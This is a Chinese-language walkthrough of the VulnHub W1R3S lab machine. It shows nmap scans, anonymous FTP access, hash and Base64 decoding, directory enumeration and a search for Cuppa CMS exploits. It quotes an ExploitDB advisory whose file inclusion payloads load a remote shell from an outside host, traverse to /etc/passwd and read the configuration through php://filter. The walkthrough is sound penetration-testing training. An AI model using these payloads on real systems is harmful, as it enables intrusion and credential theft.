一、主机发现
先查看本机与靶机所在网段,这里是eth1网卡是和靶机在同一网段,所以只查看eth1就行了
┌──(kali㉿kali)-[~]
└─$ ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.16.128 netmask 255.255.255.0 broadcast 192.168.16.255
inet6 fe80::20c:29ff:fe0a:61a4 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:0a:61:a4 txqueuelen 1000 (Ethernet)
RX packets 14 bytes 2560 (2.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 35 bytes 3250 (3.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
先用arp-scan或者nmap扫一下eth1网段的存活主机,这两个工具探测出的靶机ip是192.168.15.129
命令 | 参数 | 介绍 |
---|---|---|
|
|
eth1 接口扫描本地网络中的设备,并显示它们的 IP 和 MAC 地址。 |
|
|
-l
--localnet 选项会自动检测 eth1 接口的 IP 地址和子网掩码,并扫描整个本地子网。 |
|
|
|
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan --interface=eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1 00:50:56:c0:00:08 (Unknown)
192.168.16.2 00:50:56:f8:96:9c (Unknown)
192.168.16.129 00:0c:29:37:f4:3d (Unknown)
192.168.16.254 00:50:56:fb:ab:2b (Unknown)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.874 seconds (136.61 hosts/sec). 4 responded
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.16.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:30 CST
Nmap scan report for 192.168.16.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.000082s latency).
MAC Address: 00:50:56:F8:96:9C (VMware)
Nmap scan report for 192.168.16.129
Host is up (0.000071s latency).
MAC Address: 00:0C:29:37:F4:3D (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:AB:2B (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.94 seconds
二、信息收集
接下来就是探测靶机上开放了哪些端口
参数 | 介绍 |
---|---|
|
|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.16.129 -oA prots
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 09:43 CST
Nmap scan report for 192.168.16.129
Host is up (0.00030s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:37:F4:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
在遇到扫描结果有很多端口时,我们最好把探测的端口使用字符处理命令把端口号处理好后,再赋值给一个变量,方便调用
命令 | 参数 | 解释 |
---|---|---|
|
|
|
|
|
/ 作为分隔符,提取每行的第一个字段(即端口号) |
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ','
21,22,80,3306
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ prots=$(grep open prots.nmap | awk -F '/''{print $1}' | paste -sd ',')
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ echo$prots
21,22,80,3306
知道靶机的端口号后,就可以进行更细致的探测了,使用默认扫描脚本获取目标端口运行的服务和操作系统信息。ftp服务探测到了三个可访问目录,并提示可以使用anonymous用户登录ftp,nmap进行大胆猜测Linux的版本是Linux 3.10 - 4.11
端口 | 服务 | 描述 |
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo nmap -sT -sV -sC -O -p$prots //在输入要扫描的端口时,输入变量$prots然后按Tab键补全会自动将变量转换为其存储的端口
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.16.129 -oA detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:15 CST
Nmap scan report for 192.168.16.129
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.16.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeoutin seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:37:F4:3D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.16 - 4.6 (91%), Linux 4.10 (91%), Linux 4.4 (91%), Linux 2.6.32 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.8 (91%), Linux 5.0 - 5.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.03 seconds
再使用udp协议扫描常见的top20端口。结果都是打开或过滤状态
参数 | 介绍 |
---|---|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo nmap -sU -top-ports 20 192.168.16.129 -oA unpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 15:17 CST
Nmap scan report for 192.168.16.129
Host is up (0.00025s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:37:F4:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds
再用nmap的漏洞扫描脚本来探测靶机可能存在的漏洞。扫到了一个“/wordpress/wp-login.php”登录页面
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo nmap --script=vuln -p21,80,22,3306 192.168.16.129 -oA vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 16:03 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.16.129
Host is up (0.00026s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
3306/tcp open mysql
MAC Address: 00:0C:29:37:F4:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 348.15 seconds
再搜集完关键服务和系统信息后,我们先排个攻击顺序,先查看ftp服务器中的三个可访问目录有什么,然后
三、寻找漏洞
使用anonymous用户登录ftp服务器,登录成功后提示我们将文件传输模式改为二进制模式"binary",使用"?"命令查看当前用户可以使用的命令,查看当前目录文件,是nmap扫描到的那三个目录,进入到content目录查看里面的文件,发现有三个txt文件,使用prompt关闭交互提示方便后面下载文件,使用mget下载文件到本地,另外两个目录中的文件也全都下载下来
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$sudo ftp 192.168.16.129
Connected to 192.168.16.129.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.16.129:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ?
Commands may be abbreviated. Commands are:
! edit lpage nlist rcvbuf struct
$ epsv lpwd nmap recv sunique
account epsv4 ls ntrans reget system
append epsv6 macdef open remopts tenex
ascii exit mdelete page rename throttle
bell features mdir passive reset trace
binary fget mget pdir restart type
bye form mkdir pls rhelp umask
case ftp mls pmlsd rmdirunset
cd gate mlsd preserve rstatus usage
cdup get mlst progress runique user
chmod glob mode prompt send verbose
close hash modtime proxy sendport xferbuf
cr help more put set ?
debug idle mput pwd site
delete image mreget quit size
dir lcd msend quote sndbuf
disconnect less newer rate status
ftp> ls
229 Entering Extended Passive Mode (|||45744|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||46277|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
ftp> prompt
Interactive mode off.
ftp> mget *.txt
local: 01.txt remote: 01.txt
229 Entering Extended Passive Mode (|||42538|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |**********************************************************| 29 52.44 KiB/s 00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (33.31 KiB/s)
local: 02.txt remote: 02.txt
229 Entering Extended Passive Mode (|||40061|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |**********************************************************| 165 367.04 KiB/s 00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (234.88 KiB/s)
local: 03.txt remote: 03.txt
229 Entering Extended Passive Mode (|||42627|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |**********************************************************| 582 1.37 MiB/s 00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (897.88 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> cd docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||46023|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> mget worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||40641|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |**********************************************************| 138 114.30 KiB/s 00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (93.91 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41133|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt
226 Directory send OK.
ftp> mget employee-names.txt
local: employee-names.txt remote: employee-names.txt
229 Entering Extended Passive Mode (|||44320|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |**********************************************************| 155 156.37 KiB/s 00:00 ETA
226 Transfer complete.
155 bytes received in 00:00 (122.76 KiB/s)
ftp>
查看刚才下载下来的文件内容,先看三个txt文件的内容,第一行“New FTP Server For W1R3S.inc(新的 FTP 服务器用于 电线公司)”中的"W1R3S"是英文单词"wires",为什么要这样拼写呢?这要讲到一个互联网文化“leetspeak”,详细故事请点击连接了解
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ cat *.txt
New FTP Server For W1R3S.inc
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
___________.__ __ __ ______________________ _________ .__
__ ___/| |__ ____ / / /_ ______ _____ / _____/ |__| ____ ____
| | | | _/ __ // / | || _/ _(__ < _____ | |/ _/ ___
| | | Y ___/ / | || | / / | | | ___
|____| |___| /___ > __/ / |___||____|_ /______ /_______ / / |__|___| /___ >
/ / / / / / / / /
The W1R3S.inc employee list
Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
观察下面这串加密的的字符特征为32为十六进制数,可知其为md5加密的字符串如果不确定可以使用“hash-identifier”检测一下
01ec2d8fc11c493b25029fb1f47f39ce
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# / / / /__ _ / _ ` #
# _ __ ____ ___ /_/ / / #
# _ /'__` / ,__ _ ` #
# / _ _/__, ` _ __ _ #
# _ _ ___ _/____/ _ _ /_____ ____/ #
# /_//_//__//_//___/ /_//_/ /_____/ /___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 01ec2d8fc11c493b25029fb1f47f39ce
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
将md5字符串存储再“md5.hash”中,然后使用john撞库尝试破解
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ vim md5.hash
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo john md5.hash
Created directory: /root/.john
Warning: detected hashtype"LM", but the string is also recognized as "dynamic=md5($p)"
Use the "--format=dynamic=md5($p)" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "HAVAL-128-4"
Use the "--format=HAVAL-128-4" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "MD2"
Use the "--format=MD2" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "mdc2"
Use the "--format=mdc2" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "mscash"
Use the "--format=mscash" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "mscash2"
Use the "--format=mscash2" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "Raw-MD4"
Use the "--format=Raw-MD4" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "Raw-MD5"
Use the "--format=Raw-MD5" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "Raw-MD5u"
Use the "--format=Raw-MD5u" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "ripemd-128"
Use the "--format=ripemd-128" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "Snefru-128"
Use the "--format=Snefru-128" option to force loading these as that type instead
Warning: detected hashtype"LM", but the string is also recognized as "ZipMonster"
Use the "--format=ZipMonster" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hashtype, consider --fork=12
Will run 12 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:LM_ASCII
0g 0:00:01:39 0.06% 3/3 (ETA: 2025-03-22 16:52) 0g/s 44475Kp/s 44475Kc/s 88951KC/s ARL3P98..ARBD5TE
Session aborted
过了很久也没有爆出来结果,那我们就用浏览器上网搜一个MD5在线破解工具看看能不能爆破一下。这次使用在线工具破解出来了,结果说这不是密码,请时刻保持怀疑的态度,把这个明文记下来
md5 | 明文 |
---|---|
|
|
接下来就是第三个字符串了,根据我一坤年的ctf经验来看,这是一个Base64字符串,是不是,解🐎一下就知道了,果然是的哈
Base64 | 明文 |
---|---|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ echo"SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d
It is easy, but not that easy..
接下来就是这个由ascii码生成的符号拼接起来的公司的logo,感兴趣可以看看这个网站
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ cat 03.txt
___________.__ __ __ ______________________ _________ .__
__ ___/| |__ ____ / / /_ ______ _____ / _____/ |__| ____ ____
| | | | _/ __ // / | || _/ _(__ < _____ | |/ _/ ___
| | | Y ___/ / | || | / / | | | ___
|____| |___| /___ > __/ / |___||____|_ /______ /_______ / / |__|___| /___ >
/ / / / / / / / /
再后面有个公司员工列表,人员列表无论在什么时候都很重要,记下来
名称 | 职位 |
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resources
最后是两句话是进行了上下翻转和倒叙,我们去浏览器找找有没有在线工具 ,然后我使用的是DeepSeek将其还原了
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ以下是翻译后的句子:第一句:我不认为这是获取 root 权限的方法!(原句:`I don`t think this is the way to root!`)第二句:我们有很多工作要做,别玩了....(原句:`we have a lot of work to do, stop playing around....`)
目前21端口的这些信息提示我们不让我们继续在21端口这里探测,那我们就去看看3306端口的mysql服务有没有什么惊喜,尝试使用root用户经行空密码登录失败
参数 | 介绍 |
---|---|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo mysql -h 192.168.16.129 -u root -p
Enter password:
ERROR 1130 (HY000): Host '192.168.16.128' is not allowed to connect to this MySQL server
既然3306端口不行,那就去查看80端口上的服务是什么,访问后发现是个Apache的默认页面,查看其内容没有什么有用的信息
再看一下源代码中有没有什么,也没有有用的信息
使用gobuster扫描目录能不能找到敏感目录,成功获取了三个目录,看看里面有什么
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo gobuster dir -u http://192.168.16.129/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[sudo] kali 的密码:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.16.129/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.16.129/wordpress/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.16.129/javascript/]
/administrator (Status: 301) [Size: 324] [--> http://192.168.16.129/administrator/]
/server-status (Status: 403) [Size: 302]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
wordpress无法访问
javascript只显示出了中间件版本、操作系统的ip地址和端口
访问administrator是个框架程序管理安装的页面,里面是检测安装环境是否满足安装条件,框架是“Cuppa CMS”,我们点击“Next”按键继续下一步
跳转到数据库创建页面了
设置数据库用户名和密码为“litemao”,设置email为“[email protected]”,然后再点击“next”继续安装
配置文件和数据表格都成功创建了,但是administrator用户并没有创建成功,而且只有一个“Back”按钮,先看一下页面源代码有没有东西,没有有用的信息,点击"Back"按钮返回
那就使用searchsploit命令在本地搜索一下cuppa的历史漏洞
searchsploit
允许用户通过关键词(如软件名称、操作系统、漏洞类型等)在本地 ExploitDB 数据库中搜索公开的漏洞利用代码。找到了一个
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ searchsploit cuppa
----------------------------------------------------------------------- ----------------------
Exploit Title | Path
----------------------------------------------------------------------- ----------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion |php/webapps/25971.txt
----------------------------------------------------------------------------------------------
Shellcodes: No Results
把25971.txt下载到本地
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ searchsploit cuppa -m 25971
[!] Could not find EDB-ID #
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
cp: cannot create regular file '/home/kali/'$'351235266346234272344277241346201257''/vlunhub/W1R3S/25971.txt': Permission denied
Copied to: /home/kali/靶机信息/vlunhub/W1R3S/25971.txt
看一下25971.txt内容,漏洞描述为该漏洞为文件包含漏洞,并且无论是在linux和windows运行的cuppa都样适用,漏洞是在alertConfigField.php文件中的第22行的产生的
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ cat 25971.txt
Exploit Title : Cuppa CMS File Inclusion
Date : 4 June 2013
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.cuppacms.com/
Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
Version : Beta
Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| --------' | O .. CWH Underground Hacking Team ..
+---------------------------^----------|
_,-------, _________________________|
/ XXXXXX /| /
/ XXXXXX / /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________(
------'
VULNERABILITY: PHP CODE INJECTION
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
DESCRIPTION
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
EXPLOIT
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = ".bmp; .csv; .doc; .gif; .ico; .jpg; .jpeg; .odg; .odp; .ods; .odt; .pdf; .png; .ppt; .swf; .txt; .xcf; .xls; .docx; .xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
根据Exp提供的路径,我们可以尝试读取passwd文件,不过在以下这个路径中,只有alarts是可以确定的,但是前面的路径经过尝试是访问不了的,试了一下路径是administator/cuppa/alerts/alertConfigField.php可以访问的,但是没有成功读取passwd的内容
